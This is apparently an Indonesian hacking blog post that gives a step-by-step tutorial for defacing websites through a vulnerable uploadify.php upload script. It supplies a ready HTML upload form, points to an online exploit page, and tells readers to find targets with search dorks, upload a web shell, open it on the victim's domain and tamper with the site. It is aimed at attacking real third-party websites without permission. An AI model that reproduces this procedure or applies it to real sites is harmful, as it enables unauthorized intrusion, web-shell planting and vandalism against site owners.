Breaking

Monday, January 29, 2018

Home / deface / Cara Deface Dengan uploadify vulnerability

Cara Deface Dengan uploadify vulnerability

by on in

Cara Deface Dengan Uploadify Vulnerability Upload Script


Hallo guys Kali ini gua mau share tutorial cara deface dengan uploadify vulnerability upload shell
    Bahan-Bahan :
    PC/Laptop
    Koneksi Internet
    CSRF
    Dork
    Shell (kalo blm punya cari di google)


Tutorial Deface Teknik Uploadify Vulnerability Upload Shell

CSRF :

    <form method="post" action="urltarget">
    enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="Filedata" ><br>
    <input type="submit" name="submit" value="Tusbol">
    </form>


Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata

Tutorial :
1. Copy CSRF di atas lalu save dengan format .html

2. Dorking

3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)

4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)

5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)

6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php

7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php

8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya
Author Image

About Zhhzb
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

Related Posts:
By at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)